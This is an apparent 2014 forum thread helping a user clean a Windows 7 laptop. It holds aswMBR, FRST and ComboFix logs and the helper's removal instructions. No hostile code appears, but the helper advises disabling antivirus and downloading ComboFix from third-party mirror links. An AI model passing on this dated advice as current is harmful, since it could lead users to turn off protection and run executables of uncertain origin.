22:26:26.987 Initialize success
22:26:27.049 VM: initialized successfully
22:26:27.049 VM: Intel CPU BiosDisabled
22:26:27.127 supported disk I/O iaStor.sys
22:29:06.265 AVAST engine defs: 14110201
22:29:11.350 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
22:29:11.350 Disk 0 Vendor: ST1000LM 2AR1 Size: 953869MB BusType: 8
22:29:11.506 Disk 0 MBR read successfully I/O
22:29:11.506 Disk 0 MBR scan
22:29:11.538 Disk 0 Windows 7 default MBR code
22:29:11.678 Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS 600 MB offset 2048
22:29:11.694 Disk 0 default boot code
22:29:11.725 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 941267 MB offset 1230848
22:29:11.803 Disk 0 Partition 3 00 27 Hidden NTFS WinRE NTFS 12000 MB offset 1928945664
22:29:11.959 Disk 0 scanning C:\Windows\system32\drivers
22:29:26.919 Service scanning
22:29:55.483 Modules scanning
22:29:55.483 Disk 0 trace - called modules:
22:29:55.514 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys iaStor.sys hal.dll
22:29:55.530 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007aa6790]
22:29:55.530 3 CLASSPNP.SYS[fffff88000e4e43f] -> nt!IofCallDriver -> [0xfffffa80076c9750]
22:29:55.545 5 ACPI.sys[fffff88000f607a1] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0xfffffa80076ca050]
22:29:56.793 AVAST engine scan C:\Windows
22:29:59.508 AVAST engine scan C:\Windows\system32
22:34:00.014 AVAST engine scan C:\Windows\system32\drivers
22:34:16.598 AVAST engine scan C:\Users\Ryan
22:43:23.141 File: C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll **INFECTED** Win32:Malware-gen
22:47:09.217 AVAST engine scan C:\ProgramData
22:50:31.627 Disk 0 statistics 3962081/22/0 @ 2.48 MB/s
22:50:31.643 Scan finished successfully
22:52:57.737 Disk 0 MBR has been saved successfully to "C:\Users\Ryan\Desktop\MBR.dat"
22:52:57.768 The log file has been saved successfully to "C:\Users\Ryan\Desktop\aswMBR.txt"
Were you surfing the web when this happened?
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~~~~~~~~
If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.
Emergency Backup Procedure - Tech Support Forum (http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/306529-emergency-backup-procedure.html)
Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.
How to use ComboFix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix)
Download ComboFix from here:
Link 1 (http://www.bleepingcomputer.com/download/combofix/)
Link 2 (http://www.forospyware.com/sUBs/ComboFix.exe)
Link 3 (http://subs.geekstogo.com/ComboFix.exe)
Place ComboFix.exe on your Desktop <--Important
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with ComboFix.
* Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
You can get help on disabling your protection programs here (http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/490111-how-disable-your-security-applications.html)
Double click on ComboFix.exe & follow the prompts.
You may be asked to install or update the Recovery Console (http://en.wikipedia.org/wiki/Recovery_Console) (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)
Your desktop may go blank. This is normal. It will return when ComboFix is done. Combofix may need to reboot your computer more than once to do its job this is normal.
When finished, it shall produce a log for you. Post that log in your next reply
Note:
Do not mouseclick combofix's window whilst it's running. That may cause it to stall.
Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." Please restart the computer
---------------------------------------------------------------------------------------------
Ensure your AntiVirus and AntiSpyware applications are re-enabled.
Note: ComboFix may reset a number of Internet Explorer's settings, including making it the default browser.
Note: Combofix prevents autorun of ALL CDs, floppies and USB devices to assist with malware removal & increase security.
---------------------------------------------------------------------------------------------
If there are Internet issues after running ComboFix:
Internet Explorer:
Tools Menu -> Internet Options -> Connections Tab ->Lan Settings > uncheck "use a proxy server" and check to "Automatically detect settings". Also clear any proxy address and port. ok, apply (only if applicable), ok.
Firefox:
Tools Menu -> Options... -> Advanced Tab -> Network Tab -> "Settings" under Connection. "No Proxy" should be selected, unless you have one set up yourself.
Chrome:
Select -> Tools menu -> then "Options", then go to "Change Proxy Settings", then "LAN Settings" , then take out the check mark for "Use a proxy server for your LAN" if set, unless you set this up yourself.
Safari
Launch Safari
Go to general settings menu
Then in Preferences/ Advanced
Then on line click Proxies change settings ...
Click Internet Options, then click the Connections tab, click Network Settings.
Disable option (uncheck) for the use of proxy server ...
~~~~~~~~~~~~~~~~~~~~~
Please post
Fixlog.txt
ComboFix.txt
ascot1340
2014-11-03, 22:34
Thanks for persevering with me! I'm not sure exactly when the problem came back, but I definitely used the internet yesterday. I wasn't visiting any dangerous or illicit websites or downloading any updates. I did notice that it changed my internet security settings again and I had to reset to the default level to be able to download the FRST 64 and aswMBR and again to download the ComboFix today. After running these tools, for now I'm not seeing any of the duplicate processes running in the task manager. I've posted the logs below.
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-03 15:04:54 Run:1
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll
End
*****************
Processes closed successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => Key deleted successfully.
C:\Windows => ":nlsPreferences" ADS removed successfully.
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll => Moved successfully.
The system needed a reboot.
==== End of Fixlog ====
ComboFix 14-10-29.01 - Ryan 11/03/2014 15:13:10.1.8 - x64
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8086.6026 [GMT -5:00]
Running from: c:\users\Ryan\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
ADS - Windows: deleted 0 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Ryan\Documents\~WRL0183.tmp
c:\users\Ryan\Documents\~WRL2671.tmp
c:\users\Ryan\Documents\~WRL3044.tmp
c:\users\Ryan\g2mdlhlpx.exe
.
.
((((((((((((((((((((((((( Files Created from 2014-10-03 to 2014-11-03 )))))))))))))))))))))))))))))))
.
.
2014-11-03 03:18 . 2014-11-03 20:04 -------- d-----w- C:\FRST
2014-11-02 20:54 . 2014-10-14 19:59 11627712 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{13025DE0-7F16-4226-9575-1E479453D749}\mpengine.dll
2014-11-02 03:51 . 2014-09-16 21:25 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{C68EA64F-7F05-45AD-AB11-C561A53CAF6F}\gapaengine.dll
2014-11-02 03:51 . 2014-10-14 19:59 11627712 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-10-31 01:53 . 2014-11-02 03:30 -------- d-----w- c:\windows\ERUNT
2014-10-30 05:28 . 2014-10-30 05:28 -------- d-----w- C:\RegBackup
2014-10-30 05:27 . 2014-10-30 05:27 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-10-15 20:38 . 2014-10-15 20:38 98216 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-15 20:38 . 2014-10-15 20:38 -------- d-----w- c:\program files (x86)\Java
2014-10-14 20:19 . 2014-09-19 00:50 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-10-14 20:18 . 2014-09-18 02:00 3241472 ----a-w- c:\windows\system32\msi.dll
2014-10-14 20:18 . 2014-09-18 01:32 2363904 ----a-w- c:\windows\SysWow64\msi.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-10-31 19:58 . 2014-04-12 06:42 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-30 11:25 . 2010-11-21 03:27 275080 ------w- c:\windows\system32\MpSigStub.exe
2014-10-15 06:54 . 2014-05-09 21:11 103265616 ----a-w- c:\windows\system32\MRT.exe
2014-10-01 15:11 . 2014-04-12 06:42 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-01 15:11 . 2014-04-12 06:42 93400 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-01 15:11 . 2014-04-12 06:42 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-25 02:08 . 2014-09-30 21:47 371712 ----a-w- c:\windows\system32\qdvd.dll
2014-09-25 01:40 . 2014-09-30 21:47 519680 ----a-w- c:\windows\SysWow64\qdvd.dll
2014-09-24 00:49 . 2012-01-02 09:18 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-24 00:49 . 2012-01-02 09:18 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-09-16 21:25 . 2014-04-20 18:20 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-09-09 22:11 . 2014-09-23 20:28 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-09 21:47 . 2014-09-23 20:28 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-08-28 21:28 . 2011-03-29 01:36 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-23 02:07 . 2014-08-27 18:26 404480 ----a-w- c:\windows\system32\gdi32.dll
2014-08-23 01:45 . 2014-08-27 18:26 311808 ----a-w- c:\windows\SysWow64\gdi32.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ANT Agent"="c:\program files (x86)\Garmin\ANT Agent\ANT Agent.exe" [2013-02-15 14731776]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"USB3MON"="c:\program files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" [2012-02-26 291608]
"OSD Utility"="c:\program files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe" [2012-04-27 7892992]
"Adobe Reader Speed Launcher"="c:\program files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe" [2014-09-04 40336]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-13 43848]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-08-21 959176]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2014-09-26 271744]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
"AppInit_DLLs"=c:\windows\SysWOW64\nvinit.dll
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 ESETOlmarikOlmascoCleaner;ESET Olmarik/Olmasco Cleaner;c:\windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys;c:\windows\SYSNATIVE\Drivers\ESETOlmarikOlmascoCleaner.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 libusb0;libusb-win32 - Kernel Driver 04/08/2011 1.2.4.0;c:\windows\system32\DRIVERS\libusb0.sys;c:\windows\SYSNATIVE\DRIVERS\libusb0.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys;c:\windows\SYSNATIVE\DRIVERS\wdcsam64.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;c:\windows\system32\drivers\iusb3hcs.sys;c:\windows\SYSNATIVE\drivers\iusb3hcs.sys [x]
S0 nvpciflt;nvpciflt;c:\windows\system32\DRIVERS\nvpciflt.sys;c:\windows\SYSNATIVE\DRIVERS\nvpciflt.sys [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe;c:\program files\Intel\iCLS Client\HeciServer.exe [x]
S2 Intel(R) ME Service;Intel(R) ME Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [x]
S2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [x]
S2 nlsX86cc;Nalpeiron Licensing Service;c:\windows\SysWOW64\nlssrv32.exe;c:\windows\SysWOW64\nlssrv32.exe [x]
S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys;c:\windows\SYSNATIVE\Drivers\SSPORT.sys [x]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
S3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
S3 btath_avdt;Atheros Bluetooth AVDT Service;c:\windows\system32\drivers\btath_avdt.sys;c:\windows\SYSNATIVE\drivers\btath_avdt.sys [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
S3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
S3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
S3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
S3 CirrusLFD;CS42xxLowerFilter;c:\windows\system32\DRIVERS\CSLFDx64.sys;c:\windows\SYSNATIVE\DRIVERS\CSLFDx64.sys [x]
S3 iusb3hub;Intel(R) USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\iusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hub.sys [x]
S3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;c:\windows\system32\DRIVERS\iusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3xhc.sys [x]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\System32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 ViWDM;USB Filter Driver;c:\windows\system32\DRIVERS\ViWDM.SYS;c:\windows\SYSNATIVE\DRIVERS\ViWDM.SYS [x]
S3 vrvd5;vrvd5;c:\windows\system32\DRIVERS\vrvd5.sys;c:\windows\SYSNATIVE\DRIVERS\vrvd5.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-11-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-01-02 00:50]
.
2014-11-02 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
- c:\users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27 19:17]
.
2014-11-03 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
- c:\users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27 19:17]
.
2012-01-01 c:\windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
- c:\program files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-27 03:24]
.
2012-01-01 c:\windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
- c:\program files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-27 03:24]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FspUip"="c:\program files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe" [2012-05-01 5406104]
"SRS Premium Sound HD"="c:\program files\SRS Labs\SRS Control Panel\SRSPanel_64.exe" [2012-05-10 2170752]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-05-15 170264]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-05-15 398616]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-05-15 440088]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2012-02-13 1020064]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2012-02-13 800416]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
"CDAServer"="c:\program files\Common Files\Common Desktop Agent\CDASrv.exe" [2012-03-09 462712]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=c:\windows\System32\nvinitx.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.bing.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~2\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 192.168.200.1
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"
"ThreadingModel"="Apartment"
.
